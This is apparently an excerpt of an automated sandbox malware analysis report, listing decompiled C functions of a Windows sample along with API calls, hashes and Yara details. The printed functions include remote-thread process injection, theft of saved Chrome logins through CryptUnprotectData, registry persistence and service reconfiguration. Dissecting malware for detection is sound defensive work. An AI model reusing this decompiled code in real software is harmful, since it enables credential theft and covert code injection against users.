                                      • Opcode ID: 40422e60fc65ba10c825f25943921898f0765d4d0e811af31343e94f4a4594aa
                                      • Instruction ID: dfc1b161f276b55f3701d724bf9a4b672f63a01433047f887541aeeaf67c123d
                                      • Opcode Fuzzy Hash: 40422e60fc65ba10c825f25943921898f0765d4d0e811af31343e94f4a4594aa
                                      • Instruction Fuzzy Hash: A1516C71920619EBDB16DFA0CC96BEEB7B8EF08302F104169E901B6181EB749E58CF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00258A9C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00258A9C(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x266698, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x266698,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E0025878B(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}









                                      0x00258abb
                                      0x00258abd
                                      0x00258adc
                                      0x00258af2
                                      0x00258af7
                                      0x00258af9
                                      0x00258b05
                                      0x00258b23
                                      0x00258b32
                                      0x00258b3d
                                      0x00258b3d
                                      0x00258b50
                                      0x00258af9
                                      0x00258b5a

                                      APIs
                                      • GetFullPathNameA.KERNEL32(00266698,00000104,?,00000000), ref: 00258ABD
                                      • PathCombineA.SHLWAPI(?,?,00263510), ref: 00258ADC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00258AEC
                                      • PathCombineA.SHLWAPI(?,00266698,0000002E), ref: 00258B23
                                      • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00258B32
                                        • Part of subcall function 0025878B: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 002587A8
                                        • Part of subcall function 0025878B: GetLastError.KERNEL32 ref: 002587B5
                                        • Part of subcall function 0025878B: CloseHandle.KERNEL32(00000000), ref: 002587BC
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00258B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                      • String ID: .$Accounts\Account.rec0
                                      • API String ID: 3873318193-2526347284
                                      • Opcode ID: 1d773a8ad8aa4498b42aba28097f1441d23fbb71ac1db554839055c746e492db
                                      • Instruction ID: 05ae9a4249566b2bee5abef722b87cdd0b271be035b7b92711e18693aa15539a
                                      • Opcode Fuzzy Hash: 1d773a8ad8aa4498b42aba28097f1441d23fbb71ac1db554839055c746e492db
                                      • Instruction Fuzzy Hash: 471186B290011C6BDB20DBA4DC8DEEE777CDB05315F404596E905E3091E6B49F9C8F64
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025FD9E, Relevance: 13.6, APIs: 9, Instructions: 81injectionmemorythreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025FD9E(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E002510AD(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E00251114( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27, 0x266150, 0x800, 0);
				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x26679c = _t25;
				return _t25;
			}











                                      0x0025fdb8
                                      0x0025fdba
                                      0x0025fdc8
                                      0x0025fdd6
                                      0x0025fddb
                                      0x0025fde9
                                      0x0025fe13
                                      0x0025fe1d
                                      0x0025fe2e
                                      0x0025fe49
                                      0x0025fe5b
                                      0x0025fe5f
                                      0x0025fe6e
                                      0x0025fe76
                                      0x0025fe7d

                                      APIs
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0025FDB2
                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0025FDBD
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0025FDDB
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0025FE05
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,00266150,00000800,00000000,?,?,00000000), ref: 0025FE1D
                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0025FE2E
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0025FE45
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0025FE5B
                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0025FE6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocVirtual$HeapMemoryWrite$CreateCurrentFileModuleNameOpenProtectRemoteThread
                                      • String ID:
                                      • API String ID: 910334972-0
                                      • Opcode ID: cbd22f669ebb28d01ca8812a049b56a3584ba3a3dfd7fecda269ed0b0b976d83
                                      • Instruction ID: ef76a2e89fed08f5207fe1157880ecd3a5bb57036956f5c9f83f92a0dcf7250e
                                      • Opcode Fuzzy Hash: cbd22f669ebb28d01ca8812a049b56a3584ba3a3dfd7fecda269ed0b0b976d83
                                      • Instruction Fuzzy Hash: F1214F71640218BFF7249B51EC4FFEA7A6CDB45B60F2041A5F708AA1D1D6F06E448EA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025AFDF, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 290fileencryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E0025AFDF(void* __ecx, void* __eflags) {
				char _v8;
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t127;
				void* _t128;
				signed int _t131;
				void* _t135;
				char _t136;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				char _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t191;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				signed int _t264;
				void* _t267;
				void* _t268;
				void* _t269;

				_t269 = __eflags;
				_t263 = __ecx;
				E002531EC( &_v44, "SELECT * FROM logins");
				_t260 = 0x1a;
				E0025D75B( &_v12, _t260, _t269);
				E00253297( &_v12, _t260, _t269, "\\");
				_t261 = 8;
				E00253162( &_v12, _t269, E002532D4( &_v36, _t261, _t269));
				E00255A2D(_v36);
				E00253297( &_v12, _t261, _t269, L".tmp");
				_t262 = 0x1c;
				E0025D75B( &_v20, _t262, _t269);
				E00253297( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
					L4:
					_t264 = 0;
					goto L5;
				} else {
					E00253264( &_v20,  &_v12);
					_t127 = E00253381( &_v20,  &_v36);
					_t128 =  *((intOrPtr*)(_t263 + 0x2c))( *_t127,  &_v40, 2, 0);
					_t208 = _v36;
					_t268 = _t267 + 0x10;
					E00255A2D(_v36);
					if(_t128 == 0) {
						_t131 =  *((intOrPtr*)(_t263 + 0x38))(_v40, _v44, 0xffffffff,  &_v8, 0);
						_t268 = _t268 + 0x14;
						__eflags = _t131;
						if(_t131 != 0) {
							goto L3;
						}
						_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
						_t264 = 1;
						while(1) {
							__eflags = _t135 - 0x64;
							if(_t135 != 0x64) {
								break;
							}
							_v68 = _v68 & 0x00000000;
							_t191 = 0;
							_v64 = 0;
							_t136 = E002559AA(_t264);
							_v16 = _t136;
							E002531EC( &_v24,  *((intOrPtr*)(_t263 + 0x40))(_v8, 0));
							E002531EC( &_v60,  *((intOrPtr*)(_t263 + 0x40))(_v8, _t264));
							_t141 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
							__eflags = _t141;
							if(_t141 > 0) {
								E00252F52( &_v16, E002531EC( &_v48,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
								E00255A2D(_v48);
							}
							_t142 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
							__eflags = _t142;
							if(_t142 > 0) {
								E00252F52( &_v16, E002531EC( &_v52,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
								E00255A2D(_v52);
							}
							_t143 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
							__eflags = _t143;
							if(_t143 > 0) {
								_t171 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
								_v84 = _t171;
								_t172 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
								_t268 = _t268 + 0x10;
								_v80 = _t172;
								_t175 =  &_v84;
								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
								__eflags = _t175;
								if(_t175 != 0) {
									E00252DC1( &_v68, _v72, _v76);
									LocalFree(_v72);
									_t191 = _v64;
								}
							}
							_t144 = E00252EB9( &_v16);
							__eflags = _t144;
							if(_t144 > 0) {
								L17:
								_v100 = 0;
								_v96 = 0;
								_v92 = 0;
								__eflags = E00252EB9( &_v24);
								if(__eflags > 0) {
									E00253264( &_v100, E00252ECA( &_v24, __eflags,  &_v28));
									E00255A2D(_v28);
									_t78 =  &_v28;
									 *_t78 = _v28 & 0x00000000;
									__eflags =  *_t78;
								}
								__eflags = E00252EB9( &_v16);
								if(__eflags > 0) {
									E00253264( &_v96, E00252ECA( &_v16, __eflags,  &_v32));
									E00255A2D(_v32);
									_t85 =  &_v32;
									 *_t85 = _v32 & 0x00000000;
									__eflags =  *_t85;
								}
								__eflags = _t191;
								if(_t191 != 0) {
									E00253264( &_v92, E00252ECA(E00252D59( &_v68,  &_v56), __eflags,  &_v36));
									E00255A2D(_v36);
									_t93 =  &_v36;
									 *_t93 = _v36 & 0x00000000;
									__eflags =  *_t93;
									E00255A2D(_v56);
								}
								_t268 = _t268 - 0x10;
								_v88 = _t264;
								E00251EB9(_t268,  &_v100);
								E00251EEF(_t263);
								E0025138F( &_v100);
								goto L24;
							} else {
								__eflags = _t191;
								if(_t191 == 0) {
									L24:
									E00255A2D(_v60);
									E00255A2D(_v24);
									E00255A2D(_v16);
									E00252E66( &_v68);
									_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
									continue;
								}
								goto L17;
							}
						}
						 *((intOrPtr*)(_t263 + 0x60))(_v8);
						 *((intOrPtr*)(_t263 + 0x34))();
						E0025345A(_t268,  &_v12);
						E0025DEA9(_v40);
						L5:
						E00255A2D(_v20);
						E00255A2D(_v12);
						E00255A2D(_v44);
						return _t264;
					}
					L3:
					E0025345A(_t268,  &_v12);
					E0025DEA9(_t208);
					goto L4;
				}
			}
















































                                      0x0025afdf
                                      0x0025afe8
                                      0x0025aff2
                                      0x0025aff9
                                      0x0025affd
                                      0x0025b00a
                                      0x0025b011
                                      0x0025b01e
                                      0x0025b026
                                      0x0025b033
                                      0x0025b03a
                                      0x0025b03e
                                      0x0025b04b
                                      0x0025b05b
                                      0x0025b0b7
                                      0x0025b0b7
                                      0x00000000
                                      0x0025b06f
                                      0x0025b076
                                      0x0025b082
                                      0x0025b091
                                      0x0025b094
                                      0x0025b097
                                      0x0025b09c
                                      0x0025b0a3
                                      0x0025b0e6
                                      0x0025b0e9
                                      0x0025b0ec
                                      0x0025b0ee
                                      0x00000000
                                      0x00000000
                                      0x0025b0f3
                                      0x0025b0f8
                                      0x0025b2ea
                                      0x0025b2eb
                                      0x0025b2ee
                                      0x00000000
                                      0x00000000
                                      0x0025b0fe
                                      0x0025b102
                                      0x0025b106
                                      0x0025b109
                                      0x0025b112
                                      0x0025b11e
                                      0x0025b130
                                      0x0025b13a
                                      0x0025b13f
                                      0x0025b141
                                      0x0025b15a
                                      0x0025b162
                                      0x0025b162
                                      0x0025b16c
                                      0x0025b171
                                      0x0025b173
                                      0x0025b18c
                                      0x0025b194
                                      0x0025b194
                                      0x0025b19e
                                      0x0025b1a3
                                      0x0025b1a5
                                      0x0025b1ac
                                      0x0025b1b4
                                      0x0025b1b7
                                      0x0025b1ba
                                      0x0025b1bd
                                      0x0025b1cb
                                      0x0025b1cf
                                      0x0025b1d5
                                      0x0025b1d7
                                      0x0025b1e2
                                      0x0025b1ea
                                      0x0025b1f0
                                      0x0025b1f0
                                      0x0025b1d7
                                      0x0025b1f6
                                      0x0025b1fb
                                      0x0025b1fd
                                      0x0025b207
                                      0x0025b20c
                                      0x0025b20f
                                      0x0025b212
                                      0x0025b21a
                                      0x0025b21c
                                      0x0025b22e
                                      0x0025b236
                                      0x0025b23b
                                      0x0025b23b
                                      0x0025b23b
                                      0x0025b23b
                                      0x0025b247
                                      0x0025b249
                                      0x0025b25b
                                      0x0025b263
                                      0x0025b268
                                      0x0025b268
                                      0x0025b268
                                      0x0025b268
                                      0x0025b26c
                                      0x0025b26e
                                      0x0025b28b
                                      0x0025b293
                                      0x0025b29b
                                      0x0025b29b
                                      0x0025b29b
                                      0x0025b29f
                                      0x0025b29f
                                      0x0025b2a4
                                      0x0025b2a7
                                      0x0025b2b0
                                      0x0025b2b7
                                      0x0025b2bf
                                      0x00000000
                                      0x0025b1ff
                                      0x0025b1ff
                                      0x0025b201
                                      0x0025b2c4
                                      0x0025b2c7
                                      0x0025b2cf
                                      0x0025b2d7
                                      0x0025b2df
                                      0x0025b2e7
                                      0x00000000
                                      0x0025b2e7
                                      0x00000000
                                      0x0025b201
                                      0x0025b1fd
                                      0x0025b2f7
                                      0x0025b2fd
                                      0x0025b307
                                      0x0025b30c
                                      0x0025b0b9
                                      0x0025b0bc
                                      0x0025b0c4
                                      0x0025b0cc
                                      0x0025b0d7
                                      0x0025b0d7
                                      0x0025b0a5
                                      0x0025b0ac
                                      0x0025b0b1
                                      0x00000000
                                      0x0025b0b6

                                      APIs
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0025B053
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0025B065
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00254AC0,?), ref: 002533AE
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 002533D9
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0025B1CF
                                      • LocalFree.KERNEL32(?,?,?), ref: 0025B1EA
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025DEA9: DeleteFileW.KERNEL32(?,?,?,002529BF), ref: 0025DEB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
                                      • String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 1985407002-2809225024
                                      • Opcode ID: 47e79ea4bec968799e038071f4fff8a974b52a66951e9fa5bed38753b4364335
                                      • Instruction ID: 4e7381d6716f9ba3c76e89ff360835ab6c5f785cc95fa0c360ddd811da286889
                                      • Opcode Fuzzy Hash: 47e79ea4bec968799e038071f4fff8a974b52a66951e9fa5bed38753b4364335
                                      • Instruction Fuzzy Hash: 31A14071920519EBDB05EBA0DC56AEEB779FF14302F100129F912B61A1EF31AE29CF54
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025B81D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025B81D(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}








                                      0x0025b829
                                      0x0025b82c
                                      0x0025b832
                                      0x0025b836
                                      0x0025b847
                                      0x0025b84b
                                      0x0025b86f
                                      0x0025b873
                                      0x0025b873
                                      0x0025b87b
                                      0x0025b87e
                                      0x0025b880
                                      0x0025b84d
                                      0x0025b84e
                                      0x0025b854
                                      0x0025b854
                                      0x00000000
                                      0x0025b882
                                      0x0025b886

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B82C
                                      • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0025B841
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B84E
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025B867
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B87B
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B87E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID: ServicesActive
                                      • API String ID: 493672254-3071072050
                                      • Opcode ID: a54812c9efbe1cc96003b4cb4c128aa13708a4dd95b93dc9f1fe0f654e08f280
                                      • Instruction ID: df7891c50e1101bda5cbb8a08f08c355cbb405cbf269424caa812323422b8860
                                      • Opcode Fuzzy Hash: a54812c9efbe1cc96003b4cb4c128aa13708a4dd95b93dc9f1fe0f654e08f280
                                      • Instruction Fuzzy Hash: 2EF09631615625F7DA221F66AC8DE5B3F9DDFDA7717008222FA15D61A0CBB4CC18C6A0
                                      Uniqueness

                                      Uniqueness Score: 4.31%

                                      Function 0025F843, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E0025F843(void* __ebx, void* __ecx, void* __eflags) {
				long _t2;
				void* _t8;
				struct HINSTANCE__* _t13;
				void* _t15;
				struct HRSRC__* _t18;

				_t15 = __ecx;
				E00251052(0x2668a8, 0, 0x208);
				_t2 = GetModuleFileNameW(0, 0x2668a8, 0x208);
				__imp__#680();
				if(_t2 == 0 && E0025DB97() != 1) {
					E0025F7D0(_t15);
					_t13 = E0025FBFC();
					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
					_t8 = LoadResource(_t13, _t18);
					SizeofResource(_t13, _t18);
					if(LockResource(_t8) != 0) {
						E0025F73D(_t10);
					}
				}
				return 0;
			}








                                      0x0025f843
                                      0x0025f853
                                      0x0025f85f
                                      0x0025f865
                                      0x0025f86d
                                      0x0025f87a
                                      0x0025f889
                                      0x0025f894
                                      0x0025f898
                                      0x0025f8a2
                                      0x0025f8b2
                                      0x0025f8b6
                                      0x0025f8b6
                                      0x0025f8b2
                                      0x0025f8bf

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,002668A8,00000208,00000000,00000000,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F85F
                                      • IsUserAnAdmin.SHELL32 ref: 0025F865
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025F7D0: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,002668A8,?,?,?,?,0025F87F), ref: 0025F7F0
                                        • Part of subcall function 0025F7D0: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0025F87F), ref: 0025F80D
                                        • Part of subcall function 0025F7D0: lstrlenW.KERNEL32(002668A8,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F819
                                        • Part of subcall function 0025F7D0: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,002668A8,00000000,?,?,?,?,0025F87F,?,?,?,?,0025535D), ref: 0025F82F
                                        • Part of subcall function 0025F7D0: RegCloseKey.ADVAPI32(?,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F838
                                        • Part of subcall function 0025FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
                                      • FindResourceW.KERNEL32(00000000,00000066,WM_DSP), ref: 0025F88E
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F898
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F8A2
                                      • LockResource.KERNEL32(00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 0025F8A9
                                        • Part of subcall function 0025F73D: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 0025F77B
                                        • Part of subcall function 0025F73D: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F78F
                                        • Part of subcall function 0025F73D: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?), ref: 0025F79D
                                        • Part of subcall function 0025F73D: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockMessageModuleNameProtectSizeofUserValueWindows
                                      • String ID: WM_DSP
                                      • API String ID: 1126923897-506093727
                                      • Opcode ID: a60be182dc1185c3e491ed8c9130abdff54038275fa01c002c96414c3b8c8088
                                      • Instruction ID: 1ee7c624a99cddb509238850113c48f16051abdb709f9439945359ec91c3326b
                                      • Opcode Fuzzy Hash: a60be182dc1185c3e491ed8c9130abdff54038275fa01c002c96414c3b8c8088
                                      • Instruction Fuzzy Hash: 4EF0C232624650A7E7603B71BC4DE1F2E5C9F87752F068430FD05E6192DA7488698A74
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025582B, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0025582B(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}





                                      0x00255831
                                      0x0025583f
                                      0x00255848
                                      0x0025584c
                                      0x0025585f
                                      0x0025585f
                                      0x00255863
                                      0x00255863
                                      0x00255869

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00255833
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,002555EF,?,00000000,.bss,00000000), ref: 0025583F
                                      • ExitProcess.KERNEL32 ref: 00255863
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
